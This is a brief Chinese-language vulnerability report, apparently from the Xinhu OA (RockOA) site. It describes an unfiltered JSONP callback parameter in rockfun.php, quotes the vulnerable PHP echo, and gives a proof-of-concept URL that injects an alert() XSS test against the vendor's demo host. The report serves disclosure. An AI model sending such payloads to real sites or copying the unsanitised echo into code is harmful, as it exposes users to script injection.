rockfun.php代码存在漏洞

在此处代码callback参数完全没有做任何过滤；接收到前端传过来的数据没有做任何过滤

if(!isempt($callback)){

echo ''.$callback.'('.$result.')';

}else{

echo $result;

}

exit();

poc：http://demo.rockoa.com/api.php?callback=>alert(%27xss_test%27)>

[img,{fileurl}/img/77579.png,700]

原创文章，禁止转载复制，信呼OA官网保留一切知识产权。